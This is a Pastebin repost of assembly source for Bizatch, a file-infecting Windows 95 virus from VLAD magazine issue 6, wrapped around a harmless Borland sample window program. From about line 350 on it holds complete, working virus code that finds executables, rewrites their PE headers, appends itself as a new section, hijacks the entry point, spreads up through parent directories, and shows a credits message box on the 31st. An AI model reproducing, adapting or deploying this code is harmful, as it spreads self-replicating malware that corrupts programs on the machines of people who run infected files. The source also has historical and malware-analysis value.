Advertisement
FlyFar

VLAD Magazine - Issue #6 - ARTICLE.3_4 - Bizatch (The first Win95 virus)

Jul 6th, 2023
1,618
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 20.48 KB | Cybersecurity | 0 0
  1. ;
  2. ; Bizatch by Quantum / VLAD
  3. ;
  4. ; Welcome to the world's first Windows 95 virus.
  5. ;
  6. ; It is a great honour for me to have written this virus as this
  7. ; is ground breaking stuff.  Windows 95 is a platform that was
  8. ; designed to be uninfectable, but Microsoft did not reckon with
  9. ; the awesome power of vlad.  As such, this virus will be used as
  10. ; a minor information service for vlad.  On the 31st of every month
  11. ; every infected exe will display a message box listing the members
  12. ; of the vlad possie from the old skool to the new.
  13. ;
  14. ; The following is a host program kindly contributed by Borland International.
  15. ; This example will put up a window and beep when the right mouse button
  16. ; is pressed.  When the left mouse button is pressed, it will increment
  17. ; the displayed 32-bit counter.
  18. ;
  19. ; Everything needed to assemble this code has been put in the file
  20. ; BIZATCH.ZIP
  21. ;
  22. ; A tutorial on Win95 virii is likely to be included in this issue of vlad.
  23. ;
  24. ;-----------------------------------------------------------------------------
  25. ; You might wanna skip over this and head straight for the virus code
  26. ; which is at line 350
  27. ;
  28. .386
  29. locals
  30. jumps
  31. .model flat,STDCALL
  32. include win32.inc           ; some 32-bit constants and structures
  33.  
  34. L equ
  35.  
  36. ;
  37. ; Define the external functions we will be linking to
  38. ;
  39. extrn            BeginPaint:PROC
  40. extrn            CreateWindowExA:PROC
  41. extrn            DefWindowProcA:PROC
  42. extrn            DispatchMessageA:PROC
  43. extrn            EndPaint:PROC
  44. extrn            ExitProcess:PROC
  45. extrn            FindWindowA:PROC
  46. extrn            GetMessageA:PROC
  47. extrn            GetModuleHandleA:PROC
  48. extrn            GetStockObject:PROC
  49. extrn            InvalidateRect:PROC
  50. extrn            LoadCursorA:PROC
  51. extrn            LoadIconA:PROC
  52. extrn            MessageBeep:PROC
  53. extrn            PostQuitMessage:PROC
  54. extrn            RegisterClassA:PROC
  55. extrn            ShowWindow:PROC
  56. extrn            SetWindowPos:PROC
  57. extrn            TextOutA:PROC
  58. extrn            TranslateMessage:PROC
  59. extrn            UpdateWindow:PROC
  60.  
  61. ;
  62. ; for Unicode support, Win32 remaps some functions to either the Ansi or
  63. ; Wide char versions.  We will assume Ansi for this example.
  64. ;
  65. CreateWindowEx   equ
  66. DefWindowProc    equ
  67. DispatchMessage  equ
  68. FindWindow       equ
  69. GetMessage       equ
  70. GetModuleHandle  equ
  71. LoadCursor       equ
  72. LoadIcon         equ
  73. MessageBox       equ
  74. RegisterClass    equ
  75. TextOut          equ
  76.  
  77. .data
  78. copyright        db 'VLAD inc - 1995, peace through superior virus power..',0
  79.  
  80. newhwnd          dd 0
  81. lppaint          PAINTSTRUCT
  82. msg              MSGSTRUCT  
  83. wc               WNDCLASS    
  84. mbx_count        dd 0
  85.  
  86. hInst            dd 0
  87.  
  88. szTitleName      db 'Bizatch by Quantum / VLAD activated'
  89. zero             db 0
  90. szAlternate      db 'more than once',0
  91. szClassName      db 'ASMCLASS32',0
  92. szPaint          db 'Left Button pressed:'
  93. s_num            db '00000000h times.',0
  94. MSG_L EQU ($-offset szPaint)-1
  95.  
  96. .code
  97. ;-----------------------------------------------------------------------------
  98. ;
  99. ; This is where control is usually received from the loader.
  100. ;
  101. start:
  102.  
  103.         push    L 0
  104.         call    GetModuleHandle         ; get hmod (in eax)
  105.         mov     [hInst], eax            ; hInstance is same as HMODULE
  106.                                         ; in the Win32 world
  107.  
  108.         push    L 0
  109.         push    offset szClassName
  110.         call    FindWindow
  111.         or      eax,eax
  112.         jz      reg_class
  113.  
  114.         mov     [zero], ' '             ; space to modify title string
  115.  
  116. reg_class:
  117. ;
  118. ; initialize the WndClass structure
  119. ;
  120.         mov     [wc.clsStyle], CS_HREDRAW + CS_VREDRAW + CS_GLOBALCLASS
  121.         mov     [wc.clsLpfnWndProc], offset WndProc
  122.         mov     [wc.clsCbClsExtra], 0
  123.         mov     [wc.clsCbWndExtra], 0
  124.  
  125.         mov     eax, [hInst]
  126.         mov     [wc.clsHInstance], eax
  127.  
  128.         push    L IDI_APPLICATION
  129.         push    L 0
  130.         call    LoadIcon
  131.         mov     [wc.clsHIcon], eax
  132.  
  133.         push    L IDC_ARROW
  134.         push    L 0
  135.         call    LoadCursor
  136.         mov     [wc.clsHCursor], eax
  137.  
  138.         mov     [wc.clsHbrBackground], COLOR_WINDOW + 1
  139.         mov     dword ptr [wc.clsLpszMenuName], 0
  140.         mov     dword ptr [wc.clsLpszClassName], offset szClassName
  141.  
  142.         push    offset wc
  143.         call    RegisterClass
  144.  
  145.         push    L 0                      ; lpParam
  146.         push    [hInst]                  ; hInstance
  147.         push    L 0                      ; menu
  148.         push    L 0                      ; parent hwnd
  149.         push    L CW_USEDEFAULT          ; height
  150.         push    L CW_USEDEFAULT          ; width
  151.         push    L CW_USEDEFAULT          ; y
  152.         push    L CW_USEDEFAULT          ; x
  153.         push    L WS_OVERLAPPEDWINDOW    ; Style
  154.         push    offset szTitleName       ; Title string
  155.         push    offset szClassName       ; Class name
  156.         push    L 0                      ; extra style
  157.  
  158.         call    CreateWindowEx
  159.  
  160.         mov     [newhwnd], eax
  161.  
  162.         push    L SW_SHOWNORMAL
  163.         push    [newhwnd]
  164.         call    ShowWindow
  165.  
  166.         push    [newhwnd]
  167.         call    UpdateWindow
  168.  
  169. msg_loop:
  170.         push    L 0
  171.         push    L 0
  172.         push    L 0
  173.         push    offset msg
  174.         call    GetMessage
  175.  
  176.         cmp     ax, 0
  177.         je      end_loop
  178.  
  179.         push    offset msg
  180.         call    TranslateMessage
  181.  
  182.         push    offset msg
  183.         call    DispatchMessage
  184.  
  185.         jmp     msg_loop
  186.  
  187. end_loop:
  188.         push    [msg.msWPARAM]
  189.         call    ExitProcess
  190.  
  191.         ; we never get to here
  192.  
  193. ;-----------------------------------------------------------------------------
  194. WndProc          proc uses ebx edi esi, hwnd:DWORD, wmsg:DWORD, wparam:DWORD, lparam:DWORD
  195. ;
  196. ; WARNING: Win32 requires that EBX, EDI, and ESI be preserved!  We comply
  197. ; with this by listing those regs after the 'uses' statement in the 'proc'
  198. ; line.  This allows the Assembler to save them for us.
  199. ;
  200.         LOCAL   theDC:DWORD
  201.  
  202.         cmp     [wmsg], WM_DESTROY
  203.         je      wmdestroy
  204.         cmp     [wmsg], WM_RBUTTONDOWN
  205.         je      wmrbuttondown
  206.         cmp     [wmsg], WM_SIZE
  207.         je      wmsize
  208.         cmp     [wmsg], WM_CREATE
  209.         je      wmcreate
  210.         cmp     [wmsg], WM_LBUTTONDOWN
  211.         je      wmlbuttondown
  212.         cmp     [wmsg], WM_PAINT
  213.         je      wmpaint
  214.         cmp     [wmsg], WM_GETMINMAXINFO
  215.         je      wmgetminmaxinfo
  216.  
  217.  
  218.         jmp     defwndproc
  219.  
  220. wmpaint:
  221.         push    offset lppaint
  222.         push    [hwnd]
  223.         call    BeginPaint
  224.         mov     [theDC], eax
  225.  
  226.         mov     eax, [mbx_count]
  227.         mov     edi, offset s_num
  228.         call    HexWrite32
  229.  
  230.         push    L MSG_L           ; length of string
  231.         push    offset szPaint    ; string
  232.         push    L 5               ; y
  233.         push    L 5               ; x
  234.         push    [theDC]           ; the DC
  235.         call    TextOut
  236.  
  237.         push    offset lppaint
  238.         push    [hwnd]
  239.         call    EndPaint
  240.  
  241.         mov     eax, 0
  242.         jmp     finish
  243.  
  244. wmcreate:
  245.         mov     eax, 0
  246.         jmp     finish
  247.  
  248. defwndproc:
  249.         push    [lparam]
  250.         push    [wparam]
  251.         push    [wmsg]
  252.         push    [hwnd]
  253.         call    DefWindowProc
  254.         jmp     finish
  255.  
  256. wmdestroy:
  257.         push    L 0
  258.         call    PostQuitMessage
  259.         mov     eax, 0
  260.         jmp     finish
  261.  
  262. wmlbuttondown:
  263.         inc     [mbx_count]
  264.  
  265.         push    L 0
  266.         push    L 0
  267.         push    [hwnd]
  268.         call    InvalidateRect    ; repaint window
  269.  
  270.         mov     eax, 0
  271.         jmp     finish
  272.  
  273. wmrbuttondown:
  274.         push    L 0
  275.         call    MessageBeep
  276.         jmp     finish
  277.  
  278. wmsize:
  279.         mov     eax, 0
  280.         jmp     finish
  281.  
  282. wmgetminmaxinfo:
  283.  
  284.         mov     ebx, [lparam]  ; ptr to minmaxinfo struct
  285.         mov     [(MINMAXINFO ptr ebx).mintrackposition_x] , 350
  286.         mov     [(MINMAXINFO ptr ebx).mintrackposition_y] , 60
  287.         mov     eax, 0
  288.         jmp     finish
  289.  
  290. finish:
  291.         ret
  292. WndProc          endp
  293. ;-----------------------------------------------------------------------------
  294. HexWrite8 proc
  295. ;
  296. ; AL has two hex digits that will be written to ES:EDI in ASCII form
  297. ;
  298.  
  299.         mov     ah, al
  300.         and     al, 0fh
  301.         shr     ah, 4
  302.                                 ; ah has MSD
  303.                                 ; al has LSD
  304.         or      ax, 3030h
  305.         xchg    al, ah
  306.         cmp     ah, 39h
  307.         ja      @@4
  308. @@1:
  309.         cmp     al, 39h
  310.         ja      @@3
  311. @@2:
  312.         stosw
  313.         ret
  314. @@3:
  315.         sub     al, 30h
  316.         add     al, 'A' - 10
  317.         jmp     @@2
  318. @@4:
  319.         sub     ah, 30h
  320.         add     ah, 'A' - 10
  321.         jmp     @@1
  322. HexWrite8 endp
  323. ;-----------------------------------------------------------------------------
  324. HexWrite16 proc
  325. ;
  326. ; AX has four hex digits in it that will be written to ES:EDI
  327. ;
  328.         push    ax
  329.         xchg    al,ah
  330.         call    HexWrite8
  331.         pop     ax
  332.         call    HexWrite8
  333.         ret
  334. HexWrite16 endp
  335. ;-----------------------------------------------------------------------------
  336. HexWrite32 proc
  337. ;
  338. ; EAX has eight hex digits in it that will be written to ES:EDI
  339. ;
  340.         push    eax
  341.         shr     eax, 16
  342.         call    HexWrite16
  343.         pop     eax
  344.         call    HexWrite16
  345.         ret
  346. HexWrite32 endp
  347. ;-----------------------------------------------------------------------------
  348. public WndProc
  349. ends
  350. ;-----------------------------------------------------------------------------
  351. ;  Here is where the virus code begins.. this code is moved from exe to
  352. ;  exe.. the above is just a simple custom host.
  353.  
  354. vladseg segment para public 'vlad'
  355. assume cs:vladseg
  356. vstart:
  357. call recalc
  358. recalc:
  359. pop ebp
  360. mov eax,ebp                            ; calculate the address to the host
  361. db 2dh
  362. subme dd 30000h + (recalc - vstart)
  363. push eax                               ; save it for l8r
  364. sub ebp,offset recalc                  ; calculate the delta offset
  365.  
  366. mov eax,[ebp + offset kern2]           ; determine where the kernel is at
  367. cmp dword ptr [eax],5350fc9ch
  368. jnz notkern2
  369. mov eax,[ebp + offset kern2]           ; here
  370. jmp movit
  371. notkern2:
  372. mov eax,[ebp + offset kern1]           ; or here
  373. cmp dword ptr [eax],5350fc9ch
  374. jnz nopayload
  375. mov eax,[ebp + offset kern1]
  376. movit:
  377. mov [ebp + offset kern],eax            ; save it for l8r use
  378.  
  379. cld                                    ; important
  380. lea eax,[ebp + offset orgdir]
  381. push eax
  382. push 255
  383. call GetCurDir                         ; save the current directory
  384.  
  385. mov byte ptr [ebp + offset countinfect],0 ; count the number we are infecting
  386.  
  387. infectdir:
  388.  
  389. lea eax,[ebp + offset win32_data_thang]
  390. push eax
  391. lea eax,[ebp + offset fname]
  392. push eax
  393. call FindFile                             ; search for first exe
  394.  
  395. mov dword ptr [ebp + offset searchhandle],eax   ; save the search handle
  396. cmp eax,-1
  397. jz foundnothing
  398.  
  399. gofile:
  400.  
  401. push 0
  402. push dword ptr [ebp + offset fileattr]  ; FILE_ATTRIBUTE_NORMAL
  403. push 3 ; OPEN_EXISTING
  404. push 0
  405. push 0
  406. push 80000000h + 40000000h ; GENERIC_READ + GENERIC_WRITE
  407. lea eax,[ebp + offset fullname]
  408. push eax
  409. call CreateFile             ; open file in read/write mode
  410.  
  411. mov dword ptr [ebp + offset ahand],eax   ; save the handle
  412. cmp eax,-1
  413. jz findnextone
  414.  
  415. ; goto the dword that stores the location of the pe header
  416. push 0
  417. push 0
  418. push 3ch
  419. push dword ptr [ebp + offset ahand]
  420. call SetFilePointer
  421.  
  422. ; read in the location of the pe header
  423. push 0
  424. lea eax,[ebp + offset bytesread]
  425. push eax
  426. push 4
  427. lea eax,[ebp + offset peheaderoffset]
  428. push eax
  429. push dword ptr [ebp + offset ahand]
  430. call ReadFile
  431.  
  432. ; goto the pe header
  433. push 0
  434. push 0
  435. push dword ptr [ebp + offset peheaderoffset]
  436. push dword ptr [ebp + offset ahand]
  437. call SetFilePointer
  438.  
  439. ; read in enuff to calculate the full size of the pe header and object table
  440. push 0
  441. lea eax,[ebp + offset bytesread]
  442. push eax
  443. push 58h
  444. lea eax,[ebp + offset peheader]
  445. push eax
  446. push dword ptr [ebp + offset ahand]
  447. call ReadFile
  448.  
  449. ; make sure it is a pe header and is not already infected
  450. cmp dword ptr [ebp + offset peheader],00004550h    ; PE,0,0
  451. jnz notape
  452. cmp word ptr [ebp + offset peheader + 4ch],0F00Dh
  453. jz notape
  454. cmp dword ptr [ebp + offset 52],4000000h
  455. jz notape
  456.  
  457. ; go back to the start of the pe header
  458. push 0
  459. push 0
  460. push dword ptr [ebp + offset peheaderoffset]
  461. push dword ptr [ebp + offset ahand]
  462. call SetFilePointer
  463.  
  464. ; read in the whole pe header and object table
  465. push 0
  466. lea eax,[ebp + offset bytesread]
  467. push eax
  468. push dword ptr [ebp + offset headersize]
  469. lea eax,[ebp + offset peheader]
  470. push eax
  471. push dword ptr [ebp + offset ahand]
  472. call ReadFile
  473.  
  474. ; set the infection flag
  475. mov word ptr [ebp + offset peheader + 4ch],0F00Dh
  476.  
  477. ; locate offset of object table
  478. xor eax,eax
  479. mov ax, word ptr [ebp + offset NtHeaderSize]
  480. add eax,18h
  481. mov dword ptr [ebp + offset ObjectTableoffset],eax
  482.  
  483. ; calculate the offset of the last (null) object in the object table
  484. mov esi,dword ptr [ebp + offset ObjectTableoffset]
  485. lea eax,[ebp + offset peheader]
  486. add esi,eax
  487. xor eax,eax
  488. mov ax,[ebp + offset numObj]
  489. mov ecx,40
  490. xor edx,edx
  491. mul ecx
  492. add esi,eax
  493.  
  494. inc word ptr [ebp + offset numObj]    ; inc the number of objects
  495.  
  496. lea edi,[ebp + offset newobject]
  497. xchg edi,esi
  498.  
  499. ; calculate the Relative Virtual Address (RVA) of the new object
  500. mov eax,[edi-5*8+8]
  501. add eax,[edi-5*8+12]
  502. mov ecx,dword ptr [ebp + offset objalign]
  503. xor edx,edx
  504. div ecx
  505. inc eax
  506. mul ecx
  507. mov dword ptr [ebp + offset RVA],eax
  508.  
  509. ; calculate the physical size of the new object
  510. mov ecx,dword ptr [ebp + offset filealign]
  511. mov eax,vend-vstart
  512. xor edx,edx
  513. div ecx
  514. inc eax
  515. mul ecx
  516. mov dword ptr [ebp + offset physicalsize],eax
  517.  
  518. ; calculate the virtual size of the new object
  519. mov ecx,dword ptr [ebp + offset objalign]
  520. mov eax,vend - vstart + 1000h
  521. xor edx,edx
  522. div ecx
  523. inc eax
  524. mul ecx
  525. mov dword ptr [ebp + offset virtualsize],eax
  526.  
  527. ; calculate the physical offset of the new object
  528. mov eax,[edi-5*8+20]
  529. add eax,[edi-5*8+16]
  530. mov ecx,dword ptr [ebp + offset filealign]
  531. xor edx,edx
  532. div ecx
  533. inc eax
  534. mul ecx
  535. mov dword ptr [ebp + offset physicaloffset],eax
  536.  
  537. ; update the image size (the size in memory) of the file
  538. mov eax,vend-vstart+1000h
  539. add eax,dword ptr [ebp + offset imagesize]
  540. mov ecx,[ebp + offset objalign]
  541. xor edx,edx
  542. div ecx
  543. inc eax
  544. mul ecx
  545. mov dword ptr [ebp + offset imagesize],eax
  546.  
  547. ; copy the new object into the object table
  548. mov ecx,10
  549. rep movsd
  550.  
  551. ; calculate the entrypoint RVA
  552. mov eax,dword ptr [ebp + offset RVA]
  553.  
  554. mov ebx,dword ptr [ebp + offset entrypointRVA]
  555. mov dword ptr [ebp + offset entrypointRVA],eax
  556.  
  557. sub eax,ebx
  558. add eax,5
  559.  
  560. ; Set the value needed to return to the host
  561. mov dword ptr [ebp + offset subme],eax
  562.  
  563. ; go back to the start of the pe header
  564. push 0
  565. push 0
  566. push dword ptr [ebp + offset peheaderoffset]
  567. push dword ptr [ebp + offset ahand]
  568. call SetFilePointer
  569.  
  570. ; write the pe header and object table to the file
  571. push 0
  572. lea eax,[ebp + offset bytesread]
  573. push eax
  574. push dword ptr [ebp + offset headersize]
  575. lea eax,[ebp + offset peheader]
  576. push eax
  577. push dword ptr [ebp + offset ahand]
  578. call WriteFile
  579.  
  580. ; increase the number of files infected
  581. inc byte ptr [ebp + offset countinfect]
  582.  
  583. ; move to the physical offset of the new object
  584. push 0
  585. push 0
  586. push dword ptr [ebp + offset physicaloffset]
  587. push dword ptr [ebp + offset ahand]
  588. call SetFilePointer
  589.  
  590. ; write the virus code to the new object
  591. push 0
  592. lea eax,[ebp + offset bytesread]
  593. push eax
  594. push vend-vstart
  595. lea eax,[ebp + offset vstart]
  596. push eax
  597. push dword ptr [ebp + offset ahand]
  598. call WriteFile
  599.  
  600. notape:
  601.  
  602. ; close the file
  603. push dword ptr [ebp + offset ahand]
  604. call CloseFile
  605.  
  606. findnextone:
  607.  
  608. ; have we infected 3 ?
  609. cmp byte ptr [ebp + offset countinfect],3
  610. jz outty
  611.  
  612. ; no.. find the next file
  613. lea eax,[ebp + offset win32_data_thang]
  614. push eax
  615. push dword ptr [ebp + offset searchhandle]
  616. call FindNext
  617.  
  618. ; is there a next ? yes.. infect it
  619. or eax,eax
  620. jnz gofile
  621.  
  622. foundnothing:
  623.  
  624. ; no .. change dirs
  625. xor eax,eax
  626. lea edi,[ebp + offset tempdir]
  627. mov ecx,256/4
  628. rep stosd
  629. lea edi,[ebp + offset tempdir1]
  630. mov ecx,256/4
  631. rep stosd
  632.  
  633. ; get the current dir
  634. lea esi,[ebp + offset tempdir]
  635. push esi
  636. push 255
  637. call GetCurDir
  638.  
  639. ; change into ".."
  640. lea eax,[ebp + offset dotdot]
  641. push eax
  642. call SetCurDir
  643.  
  644. ; get the current dir
  645. lea edi,[ebp + offset tempdir1]
  646. push edi
  647. push 255
  648. call GetCurDir
  649.  
  650. ; if the dirs are the same then the ".." failed
  651. mov ecx,256/4
  652. rep cmpsd
  653. jnz infectdir
  654.  
  655. outty:
  656.  
  657. ; set the current dir back to the original
  658. lea eax,[ebp + offset orgdir]
  659. push eax
  660. call SetCurDir
  661.  
  662. ; get the current date and time and lots of other shit that no-one ever uses
  663. lea eax,[ebp + offset systimestruct]
  664. push eax
  665. call GetTime
  666.  
  667. ; if it's the 31st then do the payload
  668. cmp word ptr [ebp + offset day],31
  669. jnz nopayload
  670.  
  671. ; display a message box to the user
  672. push  1000h ; MB_SYSTEMMODAL
  673. lea eax,[ebp + offset boxtitle]
  674. push eax
  675. lea eax,[ebp + offset boxmsg]
  676. push eax
  677. push 0
  678. call MsgBox
  679.  
  680. nopayload:
  681.  
  682. ; jump back to the host
  683. pop eax
  684. jmp eax
  685.  
  686. kern dd 0BFF93B95h       ; the value of the kernel will be shoved in here
  687. kern1 dd 0BFF93B95h      ; the first possible value of the kernel
  688. kern2 dd 0BFF93C1Dh      ; the second possible value of the kernel
  689.  
  690. GetCurDir:
  691. push 0BFF77744h               ; push this value to get current dir
  692. jmp [ebp + offset kern]
  693.  
  694. SetCurDir:
  695. push 0BFF7771Dh               ; push this value to set current dir
  696. jmp [ebp + offset kern]
  697.  
  698. GetTime:
  699. cmp [ebp + offset kern],0BFF93B95h
  700. jnz gettimekern2
  701. push 0BFF9D0B6h    ; push this value if we're using kernel1 to get time/date
  702. jmp [ebp + offset kern]
  703. gettimekern2:
  704. push 0BFF9D14eh    ; push this value if we're using kernel2 to get time/date
  705. jmp [ebp + offset kern]
  706.  
  707. MsgBox:
  708. push 0BFF638D9h    ; push this value to display a message box
  709. jmp [ebp + offset kern]
  710.  
  711. FindFile:
  712. push 0BFF77893h       ; push this value to find a file
  713. jmp [ebp + offset kern]
  714.  
  715. FindNext:
  716. push 0BFF778CBh       ; push this value to find the next file
  717. jmp [ebp + offset kern]
  718.  
  719. CreateFile:
  720. push 0BFF77817h       ; push this value to create/open a file (create handle)
  721. jmp [ebp + offset kern]
  722.  
  723. SetFilePointer:
  724. push 0BFF76FA0h       ; push this value to set the file pointer of a file
  725. jmp [ebp + offset kern]
  726.  
  727. ReadFile:
  728. push 0BFF75806h       ; push this value to read a file
  729. jmp [ebp + offset kern]
  730.  
  731. WriteFile:
  732. push 0BFF7580Dh       ; push this value to write to a file
  733. jmp [ebp + offset kern]
  734.  
  735. CloseFile:
  736. push 0BFF7BC72h       ; push this value to close a file
  737. jmp [ebp + offset kern]
  738.  
  739. countinfect db 0           ; counts the infections
  740.  
  741. win32_data_thang:            ; used to search for files
  742. fileattr dd 0
  743. createtime dd 0,0
  744. lastaccesstime dd 0,0
  745. lastwritetime dd 0,0
  746. filesize dd 0,0
  747. resv dd 0,0
  748. fullname db 256 dup (0)
  749. realname db 256 dup (0)
  750.  
  751. boxtitle db "Bizatch by Quantum / VLAD",0
  752. boxmsg db "The taste of fame just got tastier!",0dh
  753.        db "VLAD Australia does it again with the world's first Win95 Virus"
  754.        db 0dh,0dh
  755.        db 9,"From the old school to the new..               ",0dh,0dh
  756.        db 9,"Metabolis",0dh
  757.        db 9,"Qark",0dh
  758.        db 9,"Darkman",0dh
  759.        db 9,"Quantum",0dh
  760.        db 9,"CoKe",0
  761.  
  762. messagetostupidavers db "Please note: the name of this virus is [Bizatch]"
  763. db " written by Quantum of VLAD",0
  764.  
  765. orgdir db 256 dup (0)
  766. tempdir db 256 dup (0)
  767. tempdir1 db 256 dup (0)
  768. dotdot db "..",0
  769.  
  770. systimestruct:                 ; used to get the time/date
  771. dw 0,0,0
  772. day dw 0
  773. dw 0,0,0,0
  774.  
  775. searchhandle dd 0            ; used in searches for files
  776. fname db '*.exe',0           ; spec to search for
  777. ahand dd 0                   ; handle of the file we open
  778. peheaderoffset dd 0          ; stores the offset of the peheader in the file
  779. ObjectTableoffset dd 0       ; stores the offset of the object table in memory
  780. bytesread dd 0               ; number of bytes we just read/wrote from/to the file
  781.  
  782. newobject:                   ; the new object
  783. oname db ".vlad",0,0,0
  784. virtualsize    dd 0
  785. RVA            dd 0
  786. physicalsize   dd 0
  787. physicaloffset dd 0
  788. reserved dd 0,0,0
  789. objectflags    db 40h,0,0,0c0h
  790.  
  791. peheader:                ; essential data for infecting the pe header
  792. signature dd 0
  793. cputype dw 0
  794. numObj dw 0
  795. db 3*4 dup (0)
  796. NtHeaderSize dw 0
  797. Flags dw 0
  798. db 4*4 dup (0)
  799. entrypointRVA dd 0
  800. db 3*4 dup (0)
  801. objalign dd 0
  802. filealign dd 0
  803. db 4*4 dup (0)
  804. imagesize dd 0
  805. headersize dd 0
  806. vend:
  807. ; space to read in the rest of the pe header and object table
  808. ; not actually written to the file but allocated by the object in post beta gen
  809. db 1000h dup (0)
  810. ends
  811. end vstart
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement